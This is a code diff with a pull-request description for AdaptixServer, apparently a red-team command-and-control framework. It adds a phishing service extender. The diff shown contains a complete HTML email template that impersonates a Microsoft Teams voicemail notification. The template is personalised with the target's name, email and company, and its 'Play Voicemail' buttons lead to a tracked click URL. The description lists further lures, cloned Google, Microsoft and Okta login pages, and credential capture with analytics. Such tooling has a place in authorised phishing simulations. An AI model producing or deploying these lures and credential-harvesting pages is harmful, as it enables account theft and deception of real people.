--- a/AdaptixServer/extenders/phishing_service/templates/voicemail_notification.html
+++ b/AdaptixServer/extenders/phishing_service/templates/voicemail_notification.html
@@ -1,0 +1,72 @@
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin:0;padding:0;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-size:14px;color:#333;background-color:#f4f4f4;">
+<table width="100%" cellpadding="0" cellspacing="0" style="background-color:#f4f4f4;padding:30px 0;">
+<tr><td align="center">
+<table width="600" cellpadding="0" cellspacing="0" style="background:#fff;border-radius:6px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,0.1);">
+
+<!-- Header -->
+<tr><td style="background-color:#464eb8;padding:24px 40px;">
+<table width="100%"><tr>
+<td><span style="color:#fff;font-size:20px;font-weight:600;">Microsoft Teams</span></td>
+<td align="right"><span style="color:rgba(255,255,255,0.7);font-size:12px;">Voicemail</span></td>
+</tr></table>
+</td></tr>
+
+<!-- Body -->
+<tr><td style="padding:32px 40px;">
+<p style="margin:0 0 20px;font-size:16px;font-weight:600;">&#128222; You have a new voicemail</p>
+
+<p style="margin:0 0 20px;">Hi {{.FirstName}},</p>
+
+<p style="margin:0 0 24px;">You received a voicemail from an external caller. The message has been transcribed and is available for review.</p>
+
+<!-- Voicemail Card -->
+<table width="100%" cellpadding="0" cellspacing="0" style="border:1px solid #e1e5e8;border-radius:6px;overflow:hidden;margin:0 0 24px;">
+<tr><td style="padding:20px;">
+<table width="100%">
+<tr>
+<td style="width:48px;vertical-align:top;">
+<div style="width:42px;height:42px;background:#6264a7;border-radius:50%;text-align:center;line-height:42px;color:#fff;font-weight:bold;font-size:16px;">?</div>
+</td>
+<td style="padding-left:14px;">
+<p style="margin:0 0 4px;font-weight:600;">Unknown Caller</p>
+<p style="margin:0 0 2px;color:#666;font-size:13px;">+1 (555) 012-3456</p>
+<p style="margin:0;color:#999;font-size:12px;">Duration: 0:47 &bull; Today at 2:34 PM</p>
+</td>
+</tr>
+</table>
+</td></tr>
+<tr><td style="background:#f8f9fa;padding:16px 20px;border-top:1px solid #e9ecef;">
+<p style="margin:0;color:#666;font-size:13px;font-style:italic;">"Hi {{.FirstName}}, this is regarding your recent inquiry. I have some important information to share with you. Please call me back or review the details I've sent. Thank you."</p>
+</td></tr>
+</table>
+
+<table cellpadding="0" cellspacing="0" style="margin:0 0 24px;">
+<tr>
+<td style="background-color:#6264a7;border-radius:4px;padding:11px 28px;">
+<a href="{{.ClickURL}}" style="color:#fff;text-decoration:none;font-size:14px;font-weight:600;">&#9654; Play Voicemail</a>
+</td>
+<td style="padding-left:12px;">
+<a href="{{.ClickURL}}" style="color:#6264a7;text-decoration:none;font-size:14px;">View in Teams</a>
+</td>
+</tr>
+</table>
+
+<p style="margin:0;color:#999;font-size:12px;">This message was delivered to {{.Email}} via Microsoft Teams.</p>
+</td></tr>
+
+<!-- Footer -->
+<tr><td style="background-color:#f8f9fa;padding:16px 40px;border-top:1px solid #e9ecef;">
+<p style="margin:0;color:#999;font-size:11px;">Microsoft Teams &bull; {{.Company}} &bull; <a href="#" style="color:#999;">Manage notifications</a></p>
+</td></tr>
+
+</table>
+</td></tr>
+</table>
+</body>
+</html>

--- a/AdaptixServer/go.work
+++ b/AdaptixServer/go.work
@@ -9,4 +9,5 @@ use (
 	./extenders/beacon_listener_tcp
 	./extenders/gopher_agent
 	./extenders/gopher_listener_tcp
+	./extenders/phishing_service
 )

--- a/AdaptixServer/profile.yaml
+++ b/AdaptixServer/profile.yaml
@@ -17,6 +17,7 @@ Teamserver:
     - "extenders/beacon_agent/config.yaml"
     - "extenders/gopher_listener_tcp/config.yaml"
     - "extenders/gopher_agent/config.yaml"
+    - "extenders/phishing_service/config.yaml"
   axscripts:
 #    - "Extension-Kit/extension-kit.axs"
   access_token_live_hours: 12


### PR DESCRIPTION
## Summary
- Phishing campaign management service
- 6 email templates: password expiry, shared document, helpdesk ticket, MFA setup, voicemail notification, default
- 4 landing pages: Google, Microsoft, Okta, default login
- Campaign tracking with click and submit analytics
- Credential capture and reporting
- Self-contained extender with `config.yaml`, `ax_config.axs`, `Makefile`

## Test plan
- [ ] Build: phishing_service plugin compiles cleanly
- [ ] Create phishing campaign with email template
- [ ] Verify landing page renders correctly
- [ ] Verify credential capture on form submit
- [ ] Verify campaign analytics (clicks, submissions)

*Split from #324 as requested*